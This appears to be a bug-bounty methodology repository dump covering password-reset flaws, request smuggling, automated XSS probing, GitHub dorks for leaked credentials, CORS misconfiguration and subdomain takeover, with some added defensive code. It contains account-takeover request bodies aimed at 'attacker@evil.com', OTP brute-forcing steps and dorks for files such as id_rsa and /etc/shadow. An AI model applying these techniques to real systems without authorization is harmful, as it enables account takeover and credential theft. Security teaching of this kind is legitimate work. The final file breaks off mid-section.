
--------------------------------------------------------------------------------
/Password_Reset_Functionality/Password_Reset_Flaws_by_Sm4rty.md:
--------------------------------------------------------------------------------
# Common security flaws in password reset functionality compiled from twitter, writeups, disclosed reports:

## 1. Password Reset Token Leak Via Referrer

- The HTTP Referer is an optional HTTP header field that identifies the address of the web page from which the resource is being requested.
The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed.

Exploitation:
```
Request a password reset to your email address
Click on the password reset link
Don't change the password
Click any 3rd-party website link (eg: Facebook, Twitter)
Intercept the request in Burp Suite proxy
Check whether the Referer header is leaking the password reset token.
```

## 2. Sending an array of email addresses instead of a single email address.

- In this attack the attacker can send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address, and it could lead to full account takeover.

```
POST https://example.com/api/v1/password_reset HTTP/1.1
Original Request Body:
{"email_address":"xyz@gmail.com"}
Modified Request Body:
{"email_address":["admin@breadcrumb.com","attacker@evil.com"]}
```
- In this way, the password reset link gets sent to both the victim and the attacker, and the attacker can use it to gain full account takeover.

## 3. Bruteforcing OTP for Resetting Password.

- Consider the case where the password reset functionality of the application is based on OTP validation.
- Many programs accept no rate limit as an acceptable risk, so brute-forcing the OTP is worth trying.
- You can reset the password of an account by intercepting the request for OTP validation and brute-forcing the 6-digit number.
- Using this, it is possible to change and reset the password of any account, by changing the user data and brute-forcing the reset OTP.

Exploitation:
```
1. Start Burp Suite and intercept the password reset request
2. Send to Intruder
3. Use null payloads
```

## 4. Full Account Takeover via Changing Email And Password of any User through API Parameters

Exploitation:
```
1. The attacker logs in with their own account and goes to the Change password function
2. Start Burp Suite and intercept the request
3. After intercepting the request, send it to Repeater and modify the Email and Password parameters
POST /api/changepass
[...]
{"form": {"email":"victim@email.tld","password":"12345678"}}
```


## 5. Response manipulation: Replace Bad Response With Good One

- Look for requests and responses like these:
```
HTTP/1.1 401 Unauthorized
{"message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful"}
```
- Change the response to:
```
HTTP/1.1 200 OK
{"message":"success","statusCode":200,"errorDescription":"Success"}
```

--------------------------------------------------------------------------------
/HTTP_Desync/http_desync.md:
--------------------------------------------------------------------------------
# HTTP Desync or Request Smuggling:
- Basics:
"HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users." -Portswigger


## Where ?:

- Any endpoint might be vulnerable to an HTTP desync attack.

- You can find the vulnerability on non-sensitive endpoints as well, but the impact is always much higher on sensitive endpoints ;)
---
### Step 1:

* Go to the Repeater tab and try various timing-based payloads to confirm the bug. More explanation here:

[Finding the Vulnerability](https://portswigger.net/web-security/request-smuggling/finding)

### Step 2:

* Once you have successfully discovered the bug, you can chain it with various bugs, e.g. account takeover by stealing session IDs, cross-site scripting attacks in the User-Agent header, etc. More description here:

[Exploiting the Vulnerability](https://portswigger.net/web-security/request-smuggling/exploiting)

---
## Tools:

1. [defparam's smuggler.py](https://github.com/defparam/smuggler)

`Usage:`
* smuggler.py:

`cat alive_urls.txt | python3 smuggler.py -m GET/POST  # either GET or POST`

OR

`python3 smuggler.py -u https://example.com -m GET/POST`

2. [Burp_smuggler](https://github.com/PortSwigger/http-request-smuggler) (also available in the BApp store)

## More Info:

### Topics

https://paper.seebug.org/1049/ (Recommended!)
45 | 46 | [Portswigger Topic](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) 47 | 48 | [Portswigger Lab](https://portswigger.net/web-security/request-smuggling) 49 | 50 | ### Reports (Hackerone): 51 | 52 | [Report 1](https://hackerone.com/reports/737140) 53 | 54 | [Report 2](https://hackerone.com/reports/867952) 55 | 56 | [Report 3](https://hackerone.com/reports/498052) 57 | 58 | [Report 4](https://hackerone.com/reports/526880) 59 | 60 | [Report 5](https://hackerone.com/reports/771666) 61 | 62 | [Report 6](https://hackerone.com/reports/753939) 63 | 64 | [Report 7](https://hackerone.com/reports/648434 ) 65 | 66 | [Report 8](https://hackerone.com/reports/740037) 67 | 68 | ## Writeups (Medium.com): 69 | 70 | [Article 1](https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142) 71 | 72 | [Article 2](https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4) 73 | 74 | [Article 3](https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d) 75 | 76 | [Article 4](https://medium.com/bugbountywriteup/crossing-the-borders-the-illegal-trade-of-http-requests-57da188520ca) 77 | 78 | ## Extra: 79 | 80 | [A Brief Video About Req. Smuggling](https://youtu.be/gzM4wWA7RFo) 81 | 82 | ### Author: 83 | [Neutron__](https://twitter.com/Neutron__) 84 | ###### If you think something was missed, feel free to add/modify/delete it :) 85 | -------------------------------------------------------------------------------- /XSS/Automated_XSS.md: -------------------------------------------------------------------------------- 1 | # Automating XSS Detection Using Dalfox, WaybackURLs, and GF Patterns 2 | 3 | ## Prerequisites: Installing Go on Your Machine 4 | 5 | Before proceeding, ensure that **Go** is installed on your system. 
You can install it using the following commands: 6 | 7 | ```bash 8 | sudo apt install -y golang 9 | export GOROOT=/usr/lib/go 10 | export GOPATH=$HOME/go 11 | export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 12 | source .bashrc 13 | ``` 14 | 15 | --- 16 | 17 | ## Hunting Blind XSS Using Dalfox 18 | 19 | To detect blind XSS vulnerabilities, follow these steps: 20 | 21 | 1. Use **WaybackURLs** to extract URLs for the target. 22 | 2. Use **GF patterns** to identify possible XSS-vulnerable parameters. 23 | 3. Utilize **Dalfox** to detect XSS. 24 | 25 | ### Execution Command: 26 | ```bash 27 | waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \ 28 | cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt 29 | ``` 30 | 31 | --- 32 | 33 | ## Hunting Reflected XSS 34 | 35 | To identify reflected XSS vulnerabilities, follow these steps: 36 | 37 | 1. Extract URLs using **WaybackURLs**. 38 | 2. Use **qsreplace** to inject payloads and analyze responses. 
### Execution Command:
```bash
# Replace every query value with the probe string, then check whether it comes back unencoded.
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '">' | \
while read host; do
  curl -s --path-as-is --insecure "$host" | grep -qs '">' && \
  echo -e "$host \033[0;31m Vulnerable"
done
```

---

## Identifying Parameters That Do Not Filter Special Characters

The following command checks whether parameters accept special characters without proper sanitization:

```bash
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
# Drop static assets, inject the probe into every parameter, and flag responses that echo it verbatim.
cat waybackurls.txt | egrep -iv "\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | \
qsreplace '"><()' | tee combinedfuzz.json && \
cat combinedfuzz.json | while read host; do
  curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && \
  echo -e "$host \033[91m Vulnerable \e[0m \n" || \
  echo -e "$host \033[92m Not Vulnerable \e[0m \n"
done | tee XSS.txt
```

---

## Downloading the Required Tools

The following tools are required for this process:

| Tool | GitHub Repository |
|------|------------------|
| **Dalfox** | [Dalfox](https://github.com/hahwul/dalfox) |
| **WaybackURLs** | [WaybackURLs](https://github.com/tomnomnom/waybackurls) |
| **GF** | [GF](https://github.com/tomnomnom/gf) |
| **GF Patterns** | [GF Patterns](https://github.com/1ndianl33t/Gf-Patterns) |
| **qsreplace** | [qsreplace](https://github.com/tomnomnom/qsreplace) |

A complete script can be found here: [QuickXSS](https://github.com/theinfosecguy/QuickXSS)

---

## Contact Information

For any questions or further discussions, feel free to reach out on Twitter:

- [@g0t_rOoT_](https://twitter.com/g0t_rOoT_)
- [@Fani Malik](https://twitter.com/fanimalikhack)
- [@Faizee Asad](https://twitter.com/faizee_asad)
- [@Prince Prafull](https://twitter.com/princeprafull3)
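All three pipelines above reduce to one question: does the probe string come back in the HTML unchanged? The following is an added example, not code from this page or from QuickXSS, that states that check as a pure function and puts the template-side fix (output encoding) beside it, run offline over constructed responses. The function names, the sample bodies and the `q` parameter are assumptions made for the example.

```javascript
// Added example (not from the original page or QuickXSS): the reflection check the shell
// pipelines above do with grep, written as a function that runs offline against
// constructed responses. Function names and sample bodies are assumptions for the example.

// Output encoding for HTML text and attribute values: the fix for raw reflection.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// "raw": the probe is in the body verbatim, so the template did not encode the parameter.
// "encoded": only the escaped form is present, so the parameter is reflected safely.
// "absent": the parameter is not reflected at all.
function classifyReflection(body, probe) {
  if (body.includes(probe)) return "raw";
  if (body.includes(escapeHtml(probe))) return "encoded";
  return "absent";
}

// The probe the third pipeline injects: a quote and angle brackets, enough to show that an
// attribute value can be closed, while containing no markup of its own.
const PROBE = '"><()';

// Constructed responses standing in for three server-side templates that echo the q parameter.
const SAMPLE_RESPONSES = {
  unsafeTemplate: `<input name="q" value="${PROBE}">`,            // echoed verbatim
  safeTemplate: `<input name="q" value="${escapeHtml(PROBE)}">`,  // echoed encoded
  noReflection: `<input name="q" value="">`,                       // not echoed
};

// Classifies every sample; keys are the template names, values "raw" / "encoded" / "absent".
function auditSamples(samples = SAMPLE_RESPONSES) {
  const result = {};
  for (const [name, body] of Object.entries(samples)) {
    result[name] = classifyReflection(body, PROBE);
  }
  return result;
}
```

The probe is deliberately an unusual character sequence: `classifyReflection` is a substring test, so a probe made of characters that occur naturally in markup (a lone `<`) would report "raw" on any page. In a regression suite the body comes from rendering the template with the probe as input; the network part of the pipelines above is not needed.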
---

*Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Github-dorks.md:
--------------------------------------------------------------------------------
**GitHub Dork List :**

**GitHub Dorks for Finding Files**

- filename:manifest.xml
- filename:travis.yml
- filename:vim_settings.xml
- filename:database
- filename:prod.exs NOT prod.secret.exs
- filename:prod.secret.exs
- filename:.npmrc _auth
- filename:.dockercfg auth
- filename:WebServers.xml
- filename:.bash_history
- filename:sftp-config.json
- filename:sftp.json path:.vscode
- filename:secrets.yml password
- filename:.esmtprc password
- filename:passwd path:etc
- filename:dbeaver-data-sources.xml
- path:sites databases password
- filename:config.php dbpasswd
- filename:configuration.php JConfig password
- filename:.sh_history
- shodan_api_key language:python
- filename:shadow path:etc
- JEKYLL_GITHUB_TOKEN
- filename:proftpdpasswd
- filename:.pgpass
- filename:idea14.key
- filename:hub oauth_token
- HEROKU_API_KEY language:json
- HEROKU_API_KEY language:shell
- SF_USERNAME salesforce
- filename:.bash_profile aws
- extension:json api.forecast.io
- filename:.env MAIL_HOST=smtp.gmail.com
- filename:wp-config.php
- extension:sql mysql dump
- filename:credentials aws_access_key_id
- filename:id_rsa or filename:id_dsa

----------

**GitHub Dorks for Finding Languages**

- language:python username
- language:php username
- language:sql username
- language:html password
- language:perl password
- language:shell username
- language:java api
- HOMEBREW_GITHUB_API_TOKEN language:shell

------

**GitHub Dorks for Finding API Keys, Tokens and Passwords**

- api_key
- "api keys"
- authorization_bearer:
- oauth
- auth
- authentication
- client_secret
- api_token:
- "api token"
- client_id
- password
- user_password
- user_pass
- passcode
- secret
- password hash
- OTP
- user auth

-----

**GitHub Dorks for Finding Usernames**

- user:name (user:admin)
- org:name (org:google type:users)
- in:login (in:login)
- in:name (in:name)
- fullname:firstname lastname (fullname: )
- in:email (data in:email)

**GitHub Dorks for Finding Information using Dates**

- created:<2012-04-05
- created:>=2011-06-12
- created:2016-02-07 location:iceland
- created:2011-04-06..2013-01-14 in:username

-----

**GitHub Dorks for Finding Information using Extension**

- extension:pem private
- extension:ppk private
- extension:sql mysql dump
- extension:sql mysql dump password
- extension:json api.forecast.io
- extension:json mongolab.com
- extension:yaml mongolab.com
- [WFClient] Password= extension:ica
- extension:avastlic "support.avast.com"
- extension:json googleusercontent client_secret
--------------------------------------------------------------------------------
/CORS/CORS.md:
--------------------------------------------------------------------------------
# Misconfigured CORS
Here are a few methods and steps you can use to check for misconfigured CORS.

* Hunting method 1 (single target):

```
Step->1. Capture the target website and spider or crawl the whole site using Burp.
Step->2. Use Burp search to look for Access-Control.
Step->3. Try adding an Origin header, i.e. Origin:attacker.com or Origin:null or Origin:attacker.target.com or Origin:target.attacker.com
Step->4. If the origin is reflected in the response, the target is vulnerable to CORS misconfiguration.
```
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

* Hunting method 2 (multiple targets, including subdomains):
```
step 1-> find domains, i.e. subfinder -d target.com -o domains.txt
step 2-> check alive ones: cat domains.txt | httpx | tee -a alive.txt
step 3-> send each alive domain into Burp, i.e. cat alive.txt | parallel -j 10 curl --proxy "http://127.0.0.1:8080" -sk 2>/dev/null
step 4-> Repeat hunting method 1
```
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

* Both of the above are manual methods, so let's check an automated way
# Tools
* [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
* [https://github.com/lc/theftfuzzer](https://github.com/lc/theftfuzzer)
* [https://github.com/s0md3v/Corsy](https://github.com/s0md3v/Corsy)
* [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe)

# Automate Way :
```
step1-> find domains, i.e. subfinder -d domain.com -o target.txt
step2-> grep alive: cat target.txt | httpx | tee -a alive.txt
step3-> grep all urls using waybackurls by @tomnomnom and the gau tool, i.e. cat alive.txt | gau | tee -a urls.txt
step4-> run any of these tools on each url
step5-> confirm the results manually
```
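What step 3 of hunting method 1 detects is, on the server side, an `Access-Control-Allow-Origin` header built by echoing the request's `Origin`. The following is an added example, not code from this page or from the tools listed, that puts that reflecting implementation next to one that exact-matches a fixed allowlist, and evaluates both against the page's probe origins plus two common regex mistakes. The allowlisted origins are placeholders.

```javascript
// Added example (not from the original page or the listed tools): the Origin reflection bug the
// hunting steps above look for, beside an exact-match allowlist. Pure functions, no framework,
// so the behaviour can be asserted in a unit test. Origins below are placeholders.

// Weak: echoes whatever Origin the client sent, with credentials. Every probe in step 3 succeeds.
function weakCorsHeaders(origin) {
  if (origin === undefined) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened: exact match on the full origin (scheme + host + port). Substring, prefix or
// unanchored regex matching is what lets attacker.target.com or target.attacker.com through.
const ALLOWED_ORIGINS = new Set([
  "https://app.target.com",
  "https://admin.target.com",
]);

function strictCorsHeaders(origin, allowed = ALLOWED_ORIGINS) {
  // Vary: Origin is sent either way so a shared cache keys the response on the Origin header.
  const headers = { Vary: "Origin" };
  // Not a string (header absent) or not allowlisted: no ACAO at all, so the browser blocks the read.
  if (typeof origin !== "string" || !allowed.has(origin)) return headers;
  headers["Access-Control-Allow-Origin"] = origin;
  headers["Access-Control-Allow-Credentials"] = "true";
  return headers;
}

// The probes from step 3 of hunting method 1, plus two that defeat naive pattern checks.
const PROBES = [
  "https://attacker.com",
  "null",                               // sandboxed iframe / local file
  "https://attacker.target.com",        // suffix-match mistake
  "https://target.attacker.com",        // prefix-match mistake
  "https://app.target.com.attacker.com", // unanchored regex mistake
  "http://app.target.com",              // right host, wrong scheme
  "https://app.target.com",             // the one legitimate origin
];

// For each probe, whether each implementation would grant a credentialed cross-origin read.
function compare() {
  return PROBES.map((origin) => ({
    origin,
    weakAllows: weakCorsHeaders(origin)["Access-Control-Allow-Origin"] === origin,
    strictAllows: strictCorsHeaders(origin)["Access-Control-Allow-Origin"] === origin,
  }));
}
```

`compare()` is the table a reviewer wants from a CORS fix: the weak implementation allows all seven, the strict one only the last. Note that `null` has to be treated as just another untrusted string; allowlisting it is equivalent to reflecting any origin, since any page can produce it with a sandboxed iframe.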
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Another Method

### Tools You Will Need for this method.
* [https://github.com/tomnomnom/meg](https://github.com/tomnomnom/meg)
* [https://github.com/tomnomnom/gf](https://github.com/tomnomnom/gf)
* [https://github.com/projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder)
* [https://github.com/tomnomnom/assetfinder](https://github.com/tomnomnom/assetfinder)
* [https://github.com/Edu4rdSHL/findomain](https://github.com/Edu4rdSHL/findomain)
* [https://github.com/projectdiscovery/httpx](https://github.com/projectdiscovery/httpx)

### Steps
```
1) Find domains with the help of subfinder, assetfinder and findomain, i.e. subfinder -d target.com | tee -a hosts1 , findomain -t target.com | tee -a hosts1 , assetfinder --subs-only target.com | tee -a hosts1
2) Then cat hosts1 | sort -u | tee -a hosts2 and then cat hosts2 | httpx | tee -a hosts
3) In the terminal, navigate to where the hosts file is located and run echo "/" > paths
4) Then type meg -v
5) After the process completes, type gf cors
6) All the urls with Access-Control-Allow will be displayed.
```

# Authors
* [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
# Contributor Covenant Code of Conduct

## Our Pledge

In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.

## Our Standards

Examples of behavior that contributes to creating a positive environment include:

* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members

Examples of unacceptable behavior by participants include:

* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting

## Our Responsibilities

Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.

Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.

## Scope

This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at patelkathan22@gmail.com. All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.

Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html

[homepage]: https://www.contributor-covenant.org

For answers to common questions about this code of conduct, see https://www.contributor-covenant.org/faq
--------------------------------------------------------------------------------
/Password_Reset_Functionality/Top_5_Password_Reset_Bugs:
--------------------------------------------------------------------------------
Common security flaws in password reset functionality, compiled from Twitter, writeups and disclosed reports:

1. Password Reset Token Leak Via Referrer

The HTTP Referer is an optional HTTP header field that identifies the address of the web page that linked to the resource being requested.
The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed.

Exploitation
Request a password reset to your email address
Click on the password reset link
Don't change the password
Click any 3rd party website link on the page (e.g. Facebook, Twitter)
Intercept the request in the Burp Suite proxy
Check if the Referer header is leaking the password reset token.

2. Sending an array of email addresses instead of a single email address.

In this attack the attacker can send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address, and it could lead to full account takeover.
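The root cause on the server side is a handler that forwards whatever `email_address` contained to the mailer. Here is an added example, not code from this page, of a lax handler next to one that insists on a single well-formed string and then addresses the mail to the account record it looked up, never to the request value. The user store, the mailer and the function names are stand-ins assumed for the example.

```javascript
// Added example (not from the original page): the "array instead of a string" bug in a reset
// handler, and the hardened version. `users`, `sendMail` and the handler names are stand-ins
// for the real store and mailer; the sample account is constructed.

const users = new Map([
  ["admin@example.com", { id: 1 }], // constructed sample record
]);

// Lax handler: accepts the value as-is. An array becomes a multi-recipient send, which is the
// behaviour described above (link delivered to victim and attacker alike).
function laxHandlePasswordReset(body, sendMail) {
  const recipients = [].concat(body.email_address); // string -> [string], array -> array
  if (recipients.some((r) => users.has(r))) {
    sendMail(recipients.join(","), "reset link");
    return { status: 202, sent: recipients };
  }
  return { status: 202, sent: [] };
}

// Exactly one string, trimmed and lower-cased; arrays, objects and numbers are rejected before
// any lookup. The syntax check is deliberately narrow (one @, no whitespace, no commas).
function normalizeEmail(value) {
  if (typeof value !== "string") return null;
  const v = value.trim().toLowerCase();
  if (v.length > 254 || !/^[^\s@,]+@[^\s@,]+\.[^\s@,]+$/.test(v)) return null;
  return v;
}

// Hardened handler. Returns what happened so it can be asserted on; the client sees 202 whether
// or not the account exists, so the endpoint does not double as an account-enumeration oracle.
function handlePasswordReset(body, sendMail) {
  const email = normalizeEmail(body && body.email_address);
  if (email === null) return { status: 400, sent: [] };
  const user = users.get(email);
  if (user) {
    // Recipient comes from the record we looked up, not from the request body.
    sendMail(email, `reset link for user ${user.id}`);
    return { status: 202, sent: [email] };
  }
  return { status: 202, sent: [] };
}
```

The same shape check belongs on every field a reset flow reads from the body (including any `user_id` or `username` alternative), since a JSON parser will happily hand the application an array wherever a string was expected.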
POST https://example.com/api/v1/password_reset HTTP/1.1
Original Request Body:
{"email_address":"xyz@gmail.com"}
Modified Request Body:
{"email_address":["admin@breadcrumb.com","attacker@evil.com"]}

In this way, the password reset link gets sent to both the victim and the attacker, and the attacker can use it to gain full account takeover.

3. Bruteforcing OTP for Resetting Password.

Now, in case the password reset functionality of the application is based on OTP validation:
Many programs accept no rate limit as an acceptable risk, so bruteforcing the OTP is worth trying.
You can reset the password of an account by intercepting the request for OTP validation and bruteforcing the 6 digit number.
Using this, it is possible to change and reset the password of any account, by changing the user data and brute-forcing the reset OTP.

Exploitation
1. Start Burp Suite and intercept the password reset request
2. Send it to Intruder
3. Use a null payload

4. Full Account Takeover via Changing Email And Password of any User through API Parameters
Exploitation

1. The attacker has to log in with their own account and go to the change password function
2. Start Burp Suite and intercept the request
3. After intercepting the request, send it to Repeater and modify the Email and Password parameters
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})

5. Response manipulation: Replace Bad Response With Good One

Look for a request and response like these
HTTP/1.1 401 Unauthorized
("message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful")

Change the response to
HTTP/1.1 200 OK
("message":"success","statusCode":200,"errorDescription":"Success")

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
I have written a medium blog on this topic if you want to check it out : https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Subdomain_Takeover/Subdomain_Takeover.md:
--------------------------------------------------------------------------------
# Subdomain Takeover

## Basics

### DNS
![DNS](dns.png)
* When a web address is accessed, e.g. "www.xyz.com", a DNS query for the host name is sent to a DNS server.
* The DNS server takes the hostname and resolves it into a numeric IP address.

### CNAME
![CNAME](cname.png)
* An alias of one domain name to another domain name.
* In the example below, xyz.company.com is the source domain and xyz.cloudservice.com is the canonical domain name.

![Subtakeover_basics](subdomain_takeover.png)

* Subdomains are mapped to a specific IP or to 3rd party services like Azure, AWS, Heroku, Github, Fastly, Shopify, etc. to serve the contents. These subdomains use a CNAME record to another domain [eg. xyz.company.com CNAME xyz.cloudservice.com]
* Now, for whatever reason, the company decides to stop using this service and, to save some money, cancels the subscription with the 3rd party cloud service provider.
* But the company forgets to update or simply remove the CNAME record in the DNS zone file.
* Since the CNAME record is not deleted from the company.com DNS zone, anyone who registers xyz.cloudservice.com has full control over xyz.company.com for as long as the DNS record is present.

## How to find subdomain takeover ?

### 1. Subdomain Enumeration
Use the following tools to enumerate subdomains
* [Assetfinder](https://github.com/tomnomnom/assetfinder)
* [Subfinder](https://github.com/projectdiscovery/subfinder)
* [Findomain](https://github.com/Edu4rdSHL/findomain)

### 2. Checking for takeover
The following tools are designed to scan a list of subdomains concurrently and identify the ones that can be hijacked.
* [Subjack](https://github.com/haccer/subjack)
* [SubOver](https://github.com/Ice3man543/SubOver)

You can also verify whether the subdomain is vulnerable by going through common error pages.
### 3. Hijacking the subdomain
Use the following GitHub repository to check whether the engine is vulnerable and for the steps for hijacking a particular engine.
* [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)

If you cannot find your engine in the above repository, [Google](https://www.google.com) is your friend !

# Case : CNAME available to buy
![CNAME available to buy](cname_buy.png)
* There are cases when the CNAME that a subdomain points to is available to buy.
* In that case the attacker can directly buy that domain and host his/her content.
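Both cases above (an unclaimed name at a provider, and a canonical domain whose apex is up for sale) are visible to the domain owner from their own zone, before anyone else finds them. Here is an added example, not code from this page or from the tools listed, of an inventory check over a zone export: it keeps only CNAME records whose target no longer resolves, and distinguishes the two cases by whether the target's apex is still registered. The zone, the resolver answers and the registry view are all constructed so the check runs offline; in use, `lookup` would call the real resolver and the apex check a real registration query.

```javascript
// Added example (not from the original page or the listed tools): a zone-inventory check for
// dangling CNAMEs. Zone records, resolver answers and the registry view are constructed stand-ins;
// company.com, cloudservice.com and example-vendor.net are placeholder names.

// Constructed zone export for company.com.
const ZONE = [
  { name: "www.company.com",  type: "A",     value: "203.0.113.10" },
  { name: "blog.company.com", type: "CNAME", value: "company-blog.cloudservice.com" },
  { name: "shop.company.com", type: "CNAME", value: "old-shop.cloudservice.com" },
  { name: "docs.company.com", type: "CNAME", value: "docs.example-vendor.net" },
];

// Constructed public-DNS answers for each CNAME target. "NXDOMAIN" = the name no longer exists.
const ANSWERS = {
  "company-blog.cloudservice.com": "198.51.100.7",
  "old-shop.cloudservice.com": "NXDOMAIN",
  "docs.example-vendor.net": "NXDOMAIN",
};

// Constructed registry view: apexes that are still registered. An unregistered apex is the
// "CNAME available to buy" case above.
const REGISTERED_APEXES = new Set(["cloudservice.com"]);

// Registrable domain of a name. Good enough for two-label public suffixes; a production check
// would consult the Public Suffix List so that e.g. co.uk is handled.
function apexOf(fqdn) {
  return fqdn.split(".").slice(-2).join(".");
}

// Stand-in resolver: in practice, a real DNS query.
function lookup(target) {
  return target in ANSWERS ? ANSWERS[target] : "NXDOMAIN";
}

// Returns the CNAMEs that need attention, each with the reason and the remediation.
function findDanglingCnames(zone = ZONE, resolve = lookup, registered = REGISTERED_APEXES) {
  const findings = [];
  for (const record of zone) {
    if (record.type !== "CNAME") continue;
    if (resolve(record.value) !== "NXDOMAIN") continue; // target resolves: not dangling
    const apex = apexOf(record.value);
    findings.push({
      name: record.name,
      target: record.value,
      reason: registered.has(apex)
        ? "target unclaimed at provider: remove the record or re-claim the name at the provider"
        : `target apex ${apex} is unregistered: remove the record`,
    });
  }
  return findings;
}
```

A target that returns NXDOMAIN is a candidate, not a confirmed takeover; whether a provider lets someone else claim the name is the per-engine question the can-i-take-over-xyz list above answers. The check also misses the A-record variant (a subdomain pointing straight at a provider IP, covered in the next file), which needs a fingerprint of the provider's "unclaimed" page rather than a DNS answer.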
### References
[How we Hijacked 26+ Subdomains](https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049)

[Subdomain Takeover: Finding Candidates](https://0xpatrik.com/subdomain-takeover-candidates/)

[Subdomain Takeover: Proof Creation for Bug Bounties](https://0xpatrik.com/takeover-proofs/)

#### Check out our talk on the same at NULL / OWASP Bangalore meetup, June 2020
[https://www.youtube.com/watch?v=xCunHBH8ZQ4](https://www.youtube.com/watch?v=xCunHBH8ZQ4)

### Reports (Hackerone)

#### Resolved

- [subdomain takeover at news-static.semrush.com](https://hackerone.com/reports/294201)
- [Subdomain takeover of resources.hackerone.com](https://hackerone.com/reports/863551)
- [Subdomain takeover at info.hacker.one](https://hackerone.com/reports/202767)
- [Bulgaria - Subdomain takeover of mail.starbucks.bg](https://hackerone.com/reports/736863)
- [Remote code execution by hijacking an unclaimed S3 bucket in Rocket.Chat's installation script.](https://hackerone.com/reports/399166)
- [Possible SOP bypass in www.starbucks.com due to insecure crossdomain.xml](https://hackerone.com/reports/244504)

# Authors:
[@aish_kendle](https://twitter.com/aish_kendle)

[@thakare_prateek](https://twitter.com/thakare_prateek)

[@klaus](https://twitter.com/klaus_dev)
--------------------------------------------------------------------------------
/Subdomain_Takeover/Sub_or_top_level_domain_takeover.md:
--------------------------------------------------------------------------------
# Subs or Top level Domain

- CNAME Record or A Record -> Points to third party services

- Check:
```
for take-overs is to query a list of domains and check for any that are either:

1. attached to a third party domain or destination via the use of a cname record

2. return a 404 not found error.

example : domain that resolved to a CloudFront domain which gave the following error: "Error the request could not be satisfied, generated by CloudFront (CloudFront)"
```
### Technical Detail

- This attack vector utilizes DNS entries pointing to service providers where the pointed subdomain is currently not in use
- Service providers:
```
Heroku, Github, Bitbucket, Squarespace, Shopify, Desk, Teamwork, Unbounce, Helpjuice, HelpScout, Pingdom, Tictail, Campaign Monitor, CargoCollective, StatusPage.io and Tumblr.
```
### Impact

- The attacker can now build a complete clone of the real site, add a login form, redirect the user, steal credentials (e.g. admin accounts) and cookies, and/or completely destroy business credibility for your company.
- Another scenario:
```
1. A Domain Owner points their * (wildcard) DNS entry to e.g. Heroku.
2. They forget to add the wildcard entry to their Heroku app.
3. An attacker can now claim any subdomain they want from the Domain Owner.
4. The Domain Owner will be unaware of the subdomain being exploited.
```
- In the not so rare case, the attacker can also "inherit" the Domain Owner's wildcard SSL certificate used inside the Service Provider.

### Exploit

- Claim CloudFront:
```
